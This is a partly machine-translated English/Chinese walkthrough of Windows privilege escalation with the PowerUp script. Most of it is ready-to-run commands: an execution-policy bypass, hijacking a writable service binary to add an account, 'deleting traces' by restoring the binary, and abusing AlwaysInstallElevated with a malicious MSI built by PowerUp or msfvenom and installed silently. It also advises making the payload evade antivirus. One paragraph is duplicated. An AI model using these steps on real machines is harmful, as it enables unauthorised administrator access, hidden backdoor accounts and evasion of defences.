PowerUp combat attack module
1. PowerUp.ps1 script uploaded to the target server, and then execute locally
2. Use the IEX this script is loaded in memory, execute the following command, the script will make all checks.
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-AllChecks"
As more items to check output busy content can be exported to facilitate the analysis view.
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-AllChecks" > sys.txt
You can also import modules in cmd bypass the policy enforcement:
powershell.exe -exec bypass -Command "& {Import-Module c:\PowerUp.ps1; Invoke-AllChecks}"
As can be seen, Powerup lists all the services that may be problematic, and AbuseFunction directly given use patterns.
第一部分通过 Get-ServiceUnquoted 模块(利用 windows 的一个逻辑漏洞,即当文件包含空格时,windows API 会解释为两个路径,并将这两个文件同时执行,有些时候可能会造成权限的提升)检测出了有 "Vulnerable Service"、"OmniServ"、"OmniServer"、"OmniServers" 四个服务存在此逻辑漏洞,但是都没有写入权限,所以并不能被我们利用来提权。第二部分通过 Test-ServiceDaclPermission 模块(检查所有可用的服务,并尝试对这些打开的服务进行修改,如果可修改,则存在此漏洞)检测出当前用户可以在 "OmniServers" 服务的目录写入相关联的可执行文件,并且通过这些文件来进行提权。
漏洞利用原理:Windows 系统服务文件在操作系统启动时会加载执行,并且在后台调用可执行文件。比如,JAVA 升级程序,每次重启系统时,JAVA 升级程序会检测 Oracle 网站,是否有新版 JAVA 程序。而类似 JAVA 程序之类的系统服务程序加载时往往都是运行在系统权限上的。所以如果一个低权限的用户对于此类系统服务调用的可执行文件具有可写的权限,那么就可以将其替换成我们的恶意可执行文件,从而随着系统启动服务而获得系统权限。
2)测试写权限
我们可以使用 icacls(Windows 内建的一个工具,用来检查对有漏洞目录是否有写入的权限)来验证下 PowerUp 脚本检测是否正确,我们先对于检测出来的漏洞目录进行权限的检测
icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe"
"Everyone" 用户对这个文件有完全控制权,就是说所有用户都具有全部权限修改这个文件夹。
参数说明:"M" 表示修改,"F" 代表完全控制,"CI" 代表从属容器将继承访问控制项,"OI" 代表从属文件将继承访问控制项。这意味着对该目录有读,写,删除其下的文件,删除该目录下的子目录的权限。
3)权限提升
在这里我们使用 AbuseFunction 那里已经给出的具体操作方式,
powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Invoke-ServiceAbuse -Name 'WMPNetworkSvc' -UserName micr067 -Password
admin@123
之后当管理员运行该服务的时候,则会添加我们的账号。(账号未添加,后续再研究)
4)删除痕迹
powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Restore-ServiceBinary -ServiceName 'WMPNetworkSvc'
恢复
"C:\Program Files\Windows Media Player\wmpnetwk.exe.bak"
为
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
l 移除备份二进制文件‘
"C:\Program Files\Windows Media Player\wmpnetwk.exe.bak"
上传PowerUp.ps1到目标机器
使用 Powerup 的 Get-RegistryAlwaysInstallElevated 模块来检查注册表项是否被设置,此策略在本地策略编辑器(gpedit.msc):
关于AlwaysInstallElevated 注册表项
Windows 环境提供组策略设置,允许常规用户安装具有系统权限的 Microsoft Windows Installer 程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。Windows 环境提供组策略设置,允许常规用户安装具有系统权限的 Microsoft Windows Installer 程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。
如果 AlwaysInstallElevated 注册表项被设置,意味着的 MSI 文件是以 system 权限运行的。命令如下,True 表示已经设置
powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Get-RegistryAlwaysInstallElevated
也可以使用注册表查看
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
0x02 权限提升
接着我们需要生成恶意的MSI安装文件,让其来添加用户,第一种方法可以使用PowerUp脚本自带的 Write-UserAddMSI 模块,运行后生成文件 UserAdd.msi
powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Write-UserAddMSI
然后我们以普通用户权限运行这个 UserAdd.msi,就会成功添加账户:
由于我是在payload域环境下,密码需要符合密码强度才能添加,否侧会弹窗报错!
添加了一个backdoor用户。
并且是管理员权限。
第二种方法,通过msfvenom生成一个msi后门,同样可以实现上面的功能。
msfvenom -f msi -p windows/adduser USER=micr067 PASS=Qwer1234! -o /root/add.msi
注意:此处对密码强度有要求,否则会报错!
meterpreter上传msi木马,然后运行即可
msiexec工具相关的参数:
/quiet=安装过程中禁止向用户发送消息
/qn=不使用图形界面
/i=安装程序
执行之后,成功添加上了该账号密码。当然这里也可以直接生成木马程序。
注:由于是msf生成的msi文件,所以默认会被杀毒软件拦截,做好免杀。
msiexec /quiet /qn /i C:\add.msi
成功添加用户。
msf下存在自动化的脚本供我们提权使用
exploit/windows/local/always_install_elevated